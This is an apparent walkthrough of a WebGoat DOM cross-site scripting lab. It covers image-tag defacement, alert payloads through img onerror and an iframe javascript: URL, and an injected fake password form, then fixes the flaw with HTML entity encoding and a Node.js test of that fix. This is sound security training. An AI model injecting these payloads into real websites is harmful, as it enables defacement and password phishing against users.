1. STAGE 1: For this exercise, your mission is to deface this website using the image at the following location: OWASP IMAGE
Use an image tag and enter the path of the OWASP image.
2. STAGE 2: Now, try to create a JavaScript alert using the image tag
Use the image tag to trigger an alert box.
3. STAGE 3: Next, try to create a JavaScript alert using the IFRAME tag.
Use the iframe tag to trigger an alert box.
4. STAGE 4: Use the following to create a fake login form:
Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
5. STAGE 5: Perform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in escape.js.
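Solution approach
Step 1:
- Find the path of the OWASP image that the exercise asks you to submit. Because it sits under the top-level webgoat path, copy the path images/logos/owasp.jpg
- Submit <img src="/images/logos/owasp.jpg">; done
Step 2: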
- Trigger an alert box with the image tag: '"><img src=x onerror=alert("xss")>
Step 3:
- Use <iframe src="javascript:alert('xss');"></iframe>
Step 4:
- Copy the provided snippet directly and use it:
- Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
Step 5: Fix
- Locate the JS file: find -name DOMXSS.js
/.extract/webapps/WebGoat/plugin_extracted/plugin/DOMXSS/js/DOMXSS.js
- Change it to:
function displayGreeting(name) {
    if (name != '') {
        // Entity-encode the user-supplied name before it reaches innerHTML
        document.getElementById("greeting").innerHTML = "Hello, " + escapeHTML(name) + "!";
    }
}
The original was:
document.getElementById("greeting").innerHTML="Hello, " + name + "!";
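Added example (not from the original write-up or WebGoat's code): the stage 5 fix exercised in Node.js against inputs modelled on the stage 2-4 payloads, comparing the original concatenation with the encoded one. The escapeHTML body here is an assumed stand-in for the helper in escape.js, and greetingVulnerable, greetingFixed, introducesMarkup and report are hypothetical names.

```javascript
// Assumed stand-in for the escapeHTML helper in escape.js (not WebGoat's source).
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHTML(value) {
  // Single pass: the "&" of an entity we just emitted is never re-encoded.
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Original behaviour: the user-supplied name is concatenated straight into markup.
function greetingVulnerable(name) {
  return name !== "" ? "Hello, " + name + "!" : "";
}

// Fixed behaviour: same string the patched displayGreeting assigns to innerHTML.
function greetingFixed(name) {
  return name !== "" ? "Hello, " + escapeHTML(name) + "!" : "";
}

// True when the string would open a tag if it were assigned to innerHTML.
function introducesMarkup(html) {
  return /<[a-zA-Z!\/]/.test(html);
}

// Constructed inputs: one benign name plus the payload shapes used in stages 2-4.
const samples = [
  "Alice & Bob",
  '<img src=x onerror=alert("xss")>',
  "<iframe src=\"javascript:alert('xss');\"></iframe>",
  '<input type = "password" name="pass"/>',
];

// One row per sample: does each variant let markup through, and what is rendered?
function report() {
  return samples.map((name) => ({
    name,
    vulnerable: introducesMarkup(greetingVulnerable(name)),
    fixed: introducesMarkup(greetingFixed(name)),
    output: greetingFixed(name),
  }));
}

console.table(report());
```

Entity encoding of this kind is correct only for HTML element content; assigning the name through textContent instead of innerHTML avoids the need to encode at all.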